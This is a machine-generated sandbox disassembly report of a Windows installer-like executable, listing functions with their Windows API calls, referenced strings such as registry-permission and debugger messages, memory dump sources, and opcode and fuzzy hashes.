                                                          • Opcode Fuzzy Hash: f9c0aa6575de5325031961dc8c28253599d1abb86677e5186b48b355b3ec359b
                                                          • Instruction Fuzzy Hash: 8DD05E90249B02A9D90073B94C46F6F224C8A90B68790843B7408F218ECA3CDC00AA3C
                                                          APIs
                                                          • BeginPaint.USER32(00000000,?), ref: 00416C4A
                                                          • SaveDC.GDI32(?), ref: 00416C7B
                                                          • ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D3D), ref: 00416CDC
                                                          • RestoreDC.GDI32(?,?), ref: 00416D03
                                                          • EndPaint.USER32(00000000,?,00416D44,00000000,00416D3D), ref: 00416D37
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                          • String ID:
                                                          • API String ID: 3808407030-0
                                                          • Opcode ID: b6c8991bbe38a25b063fe02cbbd384aaa1ab048ef0fa4b5957116aa5db27c33c
                                                          • Instruction ID: a024d51d8e1917fcb77b8775c892227abb36bb6ea51d3f2ecd71d44c14df9e09
                                                          • Opcode Fuzzy Hash: b6c8991bbe38a25b063fe02cbbd384aaa1ab048ef0fa4b5957116aa5db27c33c
                                                          • Instruction Fuzzy Hash: 90414170A04244AFCB04DBA9C595FAA77F5FF48304F1640AAE8459B362D778DD81CF54
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 76268f3067fd7e5b2c462dbffcea77bb187ec6f22ea95bd0c2474c45d8462d54
                                                          • Instruction ID: 35d93ad14ebc553eed2a21e9b47c67a907fa477780373b58b871235641bd8dc8
                                                          • Opcode Fuzzy Hash: 76268f3067fd7e5b2c462dbffcea77bb187ec6f22ea95bd0c2474c45d8462d54
                                                          • Instruction Fuzzy Hash: B23132746057409FC320EB69C584BABB7E8AF89714F04891EF9D9C7751C638EC818B19
                                                          APIs
                                                          • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429800
                                                          • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 0042982F
                                                          • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 0042984B
                                                          • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 00429876
                                                          • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 00429894
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: 9f4218a80dfb6ea41a935cea72b52cc504d621f6de5a3555e5000c6e6653befd
                                                          • Instruction ID: c6a16a7b88e0b18788f8573a4e1e1ff521d0234e697c82a38616540cbd285451
                                                          • Opcode Fuzzy Hash: 9f4218a80dfb6ea41a935cea72b52cc504d621f6de5a3555e5000c6e6653befd
                                                          • Instruction Fuzzy Hash: 0621AF707507057AE710FB67DC82F8B7AECDB41708F54483EB905AB6D2DBB8AD418618
                                                          APIs
                                                          • GetSystemMetrics.USER32(0000000B), ref: 0041BBC2
                                                          • GetSystemMetrics.USER32(0000000C), ref: 0041BBCC
                                                          • 73A1A570.USER32(00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC0A
                                                          • 73A26310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BD75,?,00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC51
                                                          • DeleteObject.GDI32(00000000), ref: 0041BC92
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: MetricsSystem$A26310A570DeleteObject
                                                          • String ID:
                                                          • API String ID: 4277397052-0
                                                          • Opcode ID: e18963905fbda8c1d4957780915d0687961bfe8337bc9852c69d647676f2e28b
                                                          • Instruction ID: 58bffdd5ee351b83518612b46dbf543796c6efca4902a0296a584a1adfede215
                                                          • Opcode Fuzzy Hash: e18963905fbda8c1d4957780915d0687961bfe8337bc9852c69d647676f2e28b
                                                          • Instruction Fuzzy Hash: E2317F70E00208EFDB04DFA5C942AAEB7F5EB48704F21856AF514EB381D7789E80DB95
                                                          APIs
                                                            • Part of subcall function 0045CE6C: SetLastError.KERNEL32(00000057,00000000,0045CF38,?,?,?,?,00000000), ref: 0045CED7
                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,00473494,?,?,0049C1D0,00000000), ref: 0047344D
                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,00473494,?,?,0049C1D0,00000000), ref: 00473463
                                                          Strings
                                                          • Could not set permissions on the registry key because it currently does not exist., xrefs: 00473457
                                                          • Failed to set permissions on registry key (%d)., xrefs: 00473474
                                                          • Setting permissions on registry key: %s\%s, xrefs: 00473412
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast
                                                          • String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
                                                          • API String ID: 1452528299-4018462623
                                                          • Opcode ID: c2b4e85895e31eb7a4579faef75fdd198930d34150e3eae1e6804dec0b8ec56e
                                                          • Instruction ID: 1dcd38469e34a8f7cdaf58011d69bd772563d378ec45d4c1a9cd481a7780d06e
                                                          • Opcode Fuzzy Hash: c2b4e85895e31eb7a4579faef75fdd198930d34150e3eae1e6804dec0b8ec56e
                                                          • Instruction Fuzzy Hash: 9221B370A042445FCB05DFAAC8816EEBBE8DF49319F50817AE448E7392D77C5E058BAD
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                          • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
                                                          • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$AllocString
                                                          • String ID:
                                                          • API String ID: 262959230-0
                                                          • Opcode ID: fdbd74c082f9815823b504bab77549cef434610d295dd08879ffad668e8b5e0c
                                                          • Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
                                                          • Opcode Fuzzy Hash: fdbd74c082f9815823b504bab77549cef434610d295dd08879ffad668e8b5e0c
                                                          • Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D
                                                          APIs
                                                          • 73A18830.GDI32(00000000,00000000,00000000), ref: 00414411
                                                          • 73A122A0.GDI32(00000000,00000000,00000000,00000000), ref: 00414419
                                                          • 73A18830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0041442D
                                                          • 73A122A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414433
                                                          • 73A1A480.USER32(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0041443E
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: A122A18830$A480
                                                          • String ID:
                                                          • API String ID: 3325508737-0
                                                          • Opcode ID: 2e378a44b9d760f9e5f1bf7c9b236df4e5f96ed4aa47b9fb48d5ba9b1bbdbb58
                                                          • Instruction ID: 53d1df8a90047df028643ee63be254e951aa3f987763a81c259c8cb4a1af4cbb
                                                          • Opcode Fuzzy Hash: 2e378a44b9d760f9e5f1bf7c9b236df4e5f96ed4aa47b9fb48d5ba9b1bbdbb58
                                                          • Instruction Fuzzy Hash: 7101D43520C3806AE600A63D8C85A9F6BDD9FC6314F05446EF484DB282C979C801C761
                                                          APIs
                                                            • Part of subcall function 0041F06C: GetActiveWindow.USER32 ref: 0041F06F
                                                            • Part of subcall function 0041F06C: GetCurrentThreadId.KERNEL32 ref: 0041F084
                                                            • Part of subcall function 0041F06C: 73A25940.USER32(00000000,Function_0001F048), ref: 0041F08A
                                                            • Part of subcall function 004231A0: GetSystemMetrics.USER32(00000000), ref: 004231A2
                                                          • OffsetRect.USER32(?,?,?), ref: 00424DC1
                                                          • DrawTextA.USER32(00000000,00000000,000000FF,?,00000C10), ref: 00424E84
                                                          • OffsetRect.USER32(?,?,?), ref: 00424E95
                                                            • Part of subcall function 0042355C: GetCurrentThreadId.KERNEL32 ref: 00423571
                                                            • Part of subcall function 0042355C: SetWindowsHookExA.USER32(00000003,00423518,00000000,00000000), ref: 00423581
                                                            • Part of subcall function 0042355C: CreateThread.KERNEL32(00000000,000003E8,004234C8,00000000,00000000), ref: 004235A5
                                                            • Part of subcall function 00424B24: SetTimer.USER32(00000000,00000001,?,004234AC), ref: 00424B3F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Thread$CurrentOffsetRect$A25940ActiveCreateDrawHookMetricsSystemTextTimerWindowWindows
                                                          • String ID: nLB
                                                          • API String ID: 1906964682-2031493005
                                                          • Opcode ID: d69f4dabb7a698d4e2161d5678524c276ca36ddb1998852898fe681b10175c4d
                                                          • Instruction ID: 6ccba84303d4583ac65c185f09da03f8435108134aba783506c2f58cc8f90ba1
                                                          • Opcode Fuzzy Hash: d69f4dabb7a698d4e2161d5678524c276ca36ddb1998852898fe681b10175c4d
                                                          • Instruction Fuzzy Hash: A7812871A00218CFDB14DFA8D884ADEBBF4FF88314F51416AE905AB296E778AD45CF44
                                                          APIs
                                                          • WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 00406FF3
                                                          • WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 0040706D
                                                          • WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070C5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Enum$NameOpenResourceUniversal
                                                          • String ID: Z
                                                          • API String ID: 3604996873-1505515367
                                                          • Opcode ID: 0cda032a99fccbc67731b5396545ffd3d82a8b59ae0714c8f86b613c94d89fe8
                                                          • Instruction ID: 6c201072c7e19ab920663406aa1001a3a7646b20d706545eb94c2f0a958ae389
                                                          • Opcode Fuzzy Hash: 0cda032a99fccbc67731b5396545ffd3d82a8b59ae0714c8f86b613c94d89fe8
                                                          • Instruction Fuzzy Hash: 17517070E04208ABDB11DF55C941A9EBBF9EF49304F1481BAE500BB3D1D778AE458B6A
                                                          APIs
                                                          • SetRectEmpty.USER32(?), ref: 0044D046
                                                          • DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044D071
                                                          • DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044D0F9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: DrawText$EmptyRect
                                                          • String ID:
                                                          • API String ID: 182455014-2867612384
                                                          • Opcode ID: aa4c93a2d6761cb4316e3b9f58fd36adaf3be60b4be49a56ecc8a50fb57c6bd0
                                                          • Instruction ID: 2c01bf535b7fc2f64207dbeae616ffe24efc4250a83762b1f7dac36c1304b9fc
                                                          • Opcode Fuzzy Hash: aa4c93a2d6761cb4316e3b9f58fd36adaf3be60b4be49a56ecc8a50fb57c6bd0
                                                          • Instruction Fuzzy Hash: 6C517171E00248AFDB11DFA9C885BDEBBF8AF49308F14447AE845EB352D7389945CB64
                                                          APIs
                                                          • 73A1A570.USER32(00000000,00000000,0042F0C0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0042EF96
                                                            • Part of subcall function 0041A1E0: CreateFontIndirectA.GDI32(?), ref: 0041A29F
                                                          • SelectObject.GDI32(?,00000000), ref: 0042EFB9
                                                          • 73A1A480.USER32(00000000,?,0042F0A5,00000000,0042F09E,?,00000000,00000000,0042F0C0,?,?,?,?,00000000,00000000,00000000), ref: 0042F098
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: A480A570CreateFontIndirectObjectSelect
                                                          • String ID: ...\
                                                          • API String ID: 2998766281-983595016
                                                          • Opcode ID: aaeb4b64b252ec620ee19bd92df8033ea15f110d648c0c566ea30b5701249572
                                                          • Instruction ID: 43f07ddd406d3cd78f52d868909731211d08e22d210600ca561f601472f043fe
                                                          • Opcode Fuzzy Hash: aaeb4b64b252ec620ee19bd92df8033ea15f110d648c0c566ea30b5701249572
                                                          • Instruction Fuzzy Hash: A6318570B00128ABDB11DF99D841BAEB7F9FB48708F90447BF410A7392C7785E44CA59
                                                          APIs
                                                          • GetFileAttributesA.KERNEL32(00000000,0049806C,00000000,00497812,?,?,00000000,0049B628), ref: 0049778C
                                                          • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,0049806C,00000000,00497812,?,?,00000000,0049B628), ref: 004977B5
                                                          • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 004977CE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: File$Attributes$Move
                                                          • String ID: isRS-%.3u.tmp
                                                          • API String ID: 3839737484-3657609586
                                                          • Opcode ID: 5e447f30b23232af434533287497b31b90de18d305760ab90fd2fc5e7a108e0f
                                                          • Instruction ID: cfa846df06bac921d3cc7342383d8013e9ea743293dbac669405f5124aadd281
                                                          • Opcode Fuzzy Hash: 5e447f30b23232af434533287497b31b90de18d305760ab90fd2fc5e7a108e0f
                                                          • Instruction Fuzzy Hash: 05213271E14209AFCF00EBA9C8859AFBBB8AF54314F51457AB414B72D1D6385E01CB59
                                                          APIs
                                                          • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
                                                          • ExitProcess.KERNEL32 ref: 00404E0D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ExitMessageProcess
                                                          • String ID: Error$Runtime error at 00000000
                                                          • API String ID: 1220098344-2970929446
                                                          • Opcode ID: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                          • Instruction ID: e2df0dcbf1ce8e07228a8ae3c957e3f7be2bf5582065763199918d440bd3f461
                                                          • Opcode Fuzzy Hash: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                          • Instruction Fuzzy Hash: 8E219560A442414ADB11A779BA8571B3B91D7E5348F04817BE710A73E3C77C8C4487ED
                                                          APIs
                                                            • Part of subcall function 0042C7FC: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C820
                                                            • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                            • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                          • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00456A70
                                                          • RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00456A9D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
                                                          • String ID: LoadTypeLib$RegisterTypeLib
                                                          • API String ID: 1312246647-2435364021
                                                          • Opcode ID: e660801773f94f20b04beacac4d0dca05fe01ebd0f05b0c2a082d9499ce0d4df
                                                          • Instruction ID: dea98cbdfb45d66fad0868bd7db80167fcb8ebb816cd54e6ac056e4ed8ccdf78
                                                          • Opcode Fuzzy Hash: e660801773f94f20b04beacac4d0dca05fe01ebd0f05b0c2a082d9499ce0d4df
                                                          • Instruction Fuzzy Hash: A9119670B00604BFDB11DFA6CD51A5EB7BDEB8A705F518476BC04E3652DA389D04CA54
                                                          APIs
                                                          • SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 00456F8E
                                                          • SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 0045702B
                                                          Strings
                                                          • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 00456FBA
                                                          • Failed to create DebugClientWnd, xrefs: 00456FF4
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
                                                          • API String ID: 3850602802-3720027226
                                                          • Opcode ID: bc4e2302685a1611cdf589b1ebeb412e0de634acd2de00c3d71195a2fbe054b6
                                                          • Instruction ID: 364b6cfc2dd25a83f1288abab6954b7d1953a24f55fd1dbca2d44010d5bb0a44
                                                          • Opcode Fuzzy Hash: bc4e2302685a1611cdf589b1ebeb412e0de634acd2de00c3d71195a2fbe054b6
                                                          • Instruction Fuzzy Hash: 6D110471604240ABD310AB689C81B5F7BD49B15319F55403EFA849B3C3D3794C08C7BE
                                                          APIs
                                                            • Part of subcall function 004242BC: SetWindowTextA.USER32(?,00000000), ref: 004242D4
                                                          • GetFocus.USER32 ref: 004781EB
                                                          • GetKeyState.USER32(0000007A), ref: 004781FD
                                                          • WaitMessage.USER32(?,00000000,00478224,?,00000000,0047824B,?,?,00000001,00000000,?,?,?,0047FA10,00000000,004808CA), ref: 00478207
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
